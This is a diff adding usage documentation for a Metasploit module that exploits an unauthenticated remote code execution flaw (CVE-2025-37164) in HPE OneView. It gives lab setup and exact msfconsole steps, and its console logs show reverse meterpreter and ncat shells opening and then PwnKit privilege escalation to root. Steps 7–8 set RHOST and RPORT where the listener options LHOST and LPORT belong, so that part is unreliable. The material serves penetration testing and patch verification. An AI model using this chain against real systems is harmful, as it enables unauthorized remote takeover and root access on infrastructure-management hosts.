|
| 1 | +## Vulnerable Application |
| 2 | +This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164, against Hewlett Packard Enterprise (HPE) |
| 3 | +OneView. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been applied), however |
| 4 | +some VM product versions do not enable the vulnerable "ID Pools" endpoint, and are not exploitable. |
| 5 | + |
| 6 | +## Testing |
| 7 | +Download a suitable VM image of HPE OneView, for example `HPE_OneView_6.60.07_Hyper_V_Z7550-97750.zip`. Extract |
| 8 | +the contents and import the VM into HyperV. Assign a network adapter to an interface that will offer DHCP (although you |
| 9 | +can also manually configure the appliances IP address later during setup). You will need around 150 GB of storage and |
| 10 | +24 GB of RAM. Once the VM has fully booted (first boot takes at least 5 minutes) you can visit the administration web |
| 11 | +interface at `https://TARGET_IP_ADDRESS/`. The default username is `Administrator` and the default password is `admin`. |
| 12 | +Upon first login you will change those. No further configuration is needed at this point. |
| 13 | + |
| 14 | +## Verification Steps |
| 15 | + |
| 16 | +1. Start msfconsole |
| 17 | +2. `use exploit/linux/http/hpe_oneview_rce` |
| 18 | + |
| 19 | +Configure the target: |
| 20 | + |
| 21 | +3. `set RHOST <TARGET_IP_ADDRESS>` |
| 22 | +4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443) |
| 23 | +5. `set SSL true` (Or set to false if targeting HTTP) |
| 24 | + |
| 25 | +Configure the payload to execute: |
| 26 | + |
| 27 | +6. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp` |
| 28 | +7. `set RHOST eth0` |
| 29 | +8. `set RPORT 4444` |
| 30 | + |
| 31 | +_Note_: These payloads have been verified to work against HPE OneView version `6.60.07`: |
| 32 | +* `cmd/linux/http/x64/meterpreter_reverse_tcp` |
| 33 | +* `cmd/unix/reverse_ncat_ssl` |
| 34 | + |
| 35 | +Run the module: |
| 36 | + |
| 37 | +9. `check` |
| 38 | +10. `exploit` |
| 39 | + |
| 40 | +## Scenarios |
| 41 | + |
| 42 | +### Example 1 |
| 43 | + |
| 44 | +This example shows a `cmd/linux/http/x64/meterpreter_reverse_tcp` payload being used against HPE OneView |
| 45 | +version `6.60.07`. |
| 46 | + |
| 47 | +``` |
| 48 | +msf > use exploit/linux/http/hpe_oneview_rce |
| 49 | +[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp |
| 50 | +msf exploit(linux/http/hpe_oneview_rce) > set RHOST 192.168.86.141 |
| 51 | +RHOST => 192.168.86.141 |
| 52 | +msf exploit(linux/http/hpe_oneview_rce) > set LHOST eth0 |
| 53 | +LHOST => eth0 |
| 54 | +msf exploit(linux/http/hpe_oneview_rce) > show options |
| 55 | +
|
| 56 | +Module options (exploit/linux/http/hpe_oneview_rce): |
| 57 | +
|
| 58 | + Name Current Setting Required Description |
| 59 | + ---- --------------- -------- ----------- |
| 60 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5 |
| 61 | + h |
| 62 | + RHOSTS 192.168.86.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 63 | + RPORT 443 yes The target port (TCP) |
| 64 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 65 | + TARGETURI / yes Base path |
| 66 | + VHOST no HTTP server virtual host |
| 67 | +
|
| 68 | +
|
| 69 | +Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): |
| 70 | +
|
| 71 | + Name Current Setting Required Description |
| 72 | + ---- --------------- -------- ----------- |
| 73 | + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP, WGET) |
| 74 | + FETCH_DELETE false yes Attempt to delete the binary after execution |
| 75 | + FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python varia |
| 76 | + nt also Python ≥3.8 (Accepted: none, bash, python3.8+) |
| 77 | + FETCH_SRVHOST no Local IP to use for serving payload |
| 78 | + FETCH_SRVPORT 8080 yes Local port to use for serving payload |
| 79 | + FETCH_URIPATH no Local URI to use for serving payload |
| 80 | + LHOST eth0 yes The listen address (an interface may be specified) |
| 81 | + LPORT 4444 yes The listen port |
| 82 | +
|
| 83 | +
|
| 84 | + When FETCH_COMMAND is one of CURL,GET,WGET: |
| 85 | +
|
| 86 | + Name Current Setting Required Description |
| 87 | + ---- --------------- -------- ----------- |
| 88 | + FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. |
| 89 | +
|
| 90 | +
|
| 91 | + When FETCH_FILELESS is none: |
| 92 | +
|
| 93 | + Name Current Setting Required Description |
| 94 | + ---- --------------- -------- ----------- |
| 95 | + FETCH_FILENAME GJCYDdyrrpbD no Name to use on remote system when storing payload; cannot contain spaces or slashes |
| 96 | + FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces |
| 97 | +
|
| 98 | +
|
| 99 | +Exploit target: |
| 100 | +
|
| 101 | + Id Name |
| 102 | + -- ---- |
| 103 | + 0 Default |
| 104 | +
|
| 105 | +
|
| 106 | +
|
| 107 | +View the full module info with the info, or info -d command. |
| 108 | +
|
| 109 | +msf exploit(linux/http/hpe_oneview_rce) > check |
| 110 | +[+] 192.168.86.141:443 - The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691 |
| 111 | +msf exploit(linux/http/hpe_oneview_rce) > exploit |
| 112 | +[*] Started reverse TCP handler on 192.168.86.122:4444 |
| 113 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 114 | +[+] The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691 |
| 115 | +[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.141:22164) at 2025-12-19 12:21:36 +0000 |
| 116 | +
|
| 117 | +meterpreter > getuid |
| 118 | +Server username: trm3 |
| 119 | +meterpreter > sysinfo |
| 120 | +Computer : 192.168.86.141 |
| 121 | +OS : Red Hat 7.7.1908 (Linux 3.10.0-1062.1.2.el7.x86_64) |
| 122 | +Architecture : x64 |
| 123 | +BuildTuple : x86_64-linux-musl |
| 124 | +Meterpreter : x64/linux |
| 125 | +meterpreter > pwd |
| 126 | +/ci/jetty-trm3 |
| 127 | +meterpreter > |
| 128 | +``` |
| 129 | + |
| 130 | +### Example 2 |
| 131 | + |
| 132 | +This example shows a `cmd/unix/reverse_ncat_ssl` payload being used against HPE OneView version `6.60.07`. |
| 133 | + |
| 134 | +``` |
| 135 | +msf exploit(linux/http/hpe_oneview_rce) > set PAYLOAD cmd/unix/reverse_ncat_ssl |
| 136 | +PAYLOAD => cmd/unix/reverse_ncat_ssl |
| 137 | +msf exploit(linux/http/hpe_oneview_rce) > show options |
| 138 | +
|
| 139 | +Module options (exploit/linux/http/hpe_oneview_rce): |
| 140 | +
|
| 141 | + Name Current Setting Required Description |
| 142 | + ---- --------------- -------- ----------- |
| 143 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5 |
| 144 | + h |
| 145 | + RHOSTS 192.168.86.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 146 | + RPORT 443 yes The target port (TCP) |
| 147 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 148 | + TARGETURI / yes Base path |
| 149 | + VHOST no HTTP server virtual host |
| 150 | +
|
| 151 | +
|
| 152 | +Payload options (cmd/unix/reverse_ncat_ssl): |
| 153 | +
|
| 154 | + Name Current Setting Required Description |
| 155 | + ---- --------------- -------- ----------- |
| 156 | + LHOST eth0 yes The listen address (an interface may be specified) |
| 157 | + LPORT 4444 yes The listen port |
| 158 | +
|
| 159 | +
|
| 160 | +Exploit target: |
| 161 | +
|
| 162 | + Id Name |
| 163 | + -- ---- |
| 164 | + 0 Default |
| 165 | +
|
| 166 | +
|
| 167 | +
|
| 168 | +View the full module info with the info, or info -d command. |
| 169 | +
|
| 170 | +msf exploit(linux/http/hpe_oneview_rce) > exploit |
| 171 | +[*] Started reverse SSL handler on 192.168.86.122:4444 |
| 172 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 173 | +[+] The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691 |
| 174 | +[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.141:22420) at 2025-12-19 12:22:58 +0000 |
| 175 | +
|
| 176 | +id |
| 177 | +uid=1063(trm3) gid=1063(trm3) groups=1063(trm3),1000(logs),1001(trmall),1002(trustedrm),1004(cryptogrp),1009(maintpwd),1050(jetty) context=system_u:system_r:unconfined_t:s0 |
| 178 | +uname -a |
| 179 | +Linux ci-00155d5622a2 3.10.0-1062.1.2.el7.x86_64 #1 SMP Mon Sep 30 14:19:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux |
| 180 | +pwd |
| 181 | +/ci/jetty-trm3 |
| 182 | +``` |
| 183 | + |
| 184 | +### Example 3 (LPE) |
| 185 | + |
| 186 | +This example shows how we can use an existing Meterpreter session on an HPE OneView version `6.60.07` device, to |
| 187 | +escalate privileges from `trm3` to `root` via the `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module. |
| 188 | + |
| 189 | +``` |
| 190 | +msf exploit(linux/http/hpe_oneview_rce) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec |
| 191 | +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp |
| 192 | +msf exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options |
| 193 | +
|
| 194 | +Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec): |
| 195 | +
|
| 196 | + Name Current Setting Required Description |
| 197 | + ---- --------------- -------- ----------- |
| 198 | + PKEXEC_PATH no The path to pkexec binary |
| 199 | + SESSION yes The session to run this module on |
| 200 | + WRITABLE_DIR /tmp yes A directory where we can write files |
| 201 | +
|
| 202 | +
|
| 203 | +Payload options (linux/x64/meterpreter/reverse_tcp): |
| 204 | +
|
| 205 | + Name Current Setting Required Description |
| 206 | + ---- --------------- -------- ----------- |
| 207 | + LHOST 192.168.86.122 yes The listen address (an interface may be specified) |
| 208 | + LPORT 4444 yes The listen port |
| 209 | +
|
| 210 | +
|
| 211 | +Exploit target: |
| 212 | +
|
| 213 | + Id Name |
| 214 | + -- ---- |
| 215 | + 0 x86_64 |
| 216 | +
|
| 217 | +
|
| 218 | +
|
| 219 | +View the full module info with the info, or info -d command. |
| 220 | +
|
| 221 | +msf exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION -1 |
| 222 | +SESSION => -1 |
| 223 | +msf exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > check |
| 224 | +[!] Verify cleanup of /tmp/.iqdxjnbz |
| 225 | +[+] The target is vulnerable. |
| 226 | +msf exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit |
| 227 | +[*] Started reverse TCP handler on 192.168.86.122:4444 |
| 228 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 229 | +[!] Verify cleanup of /tmp/.bhynibsojtwt |
| 230 | +[+] The target is vulnerable. |
| 231 | +[*] Writing '/tmp/.nnxtulq/gnrxtl/gnrxtl.so' (540 bytes) ... |
| 232 | +[!] Verify cleanup of /tmp/.nnxtulq |
| 233 | +[*] Sending stage (3090404 bytes) to 192.168.86.141 |
| 234 | +[+] Deleted /tmp/.nnxtulq/gnrxtl/gnrxtl.so |
| 235 | +[+] Deleted /tmp/.nnxtulq/.rmlacsp |
| 236 | +[+] Deleted /tmp/.nnxtulq |
| 237 | +[*] Meterpreter session 7 opened (192.168.86.122:4444 -> 192.168.86.141:30172) at 2025-12-19 12:58:51 +0000 |
| 238 | +
|
| 239 | +meterpreter > getuid |
| 240 | +Server username: root |
| 241 | +meterpreter > sysinfo |
| 242 | +Computer : 192.168.86.141 |
| 243 | +OS : Red Hat 7.7.1908 (Linux 3.10.0-1062.1.2.el7.x86_64) |
| 244 | +Architecture : x64 |
| 245 | +BuildTuple : x86_64-linux-musl |
| 246 | +Meterpreter : x64/linux |
| 247 | +meterpreter > |
| 248 | +``` |
0 commit comments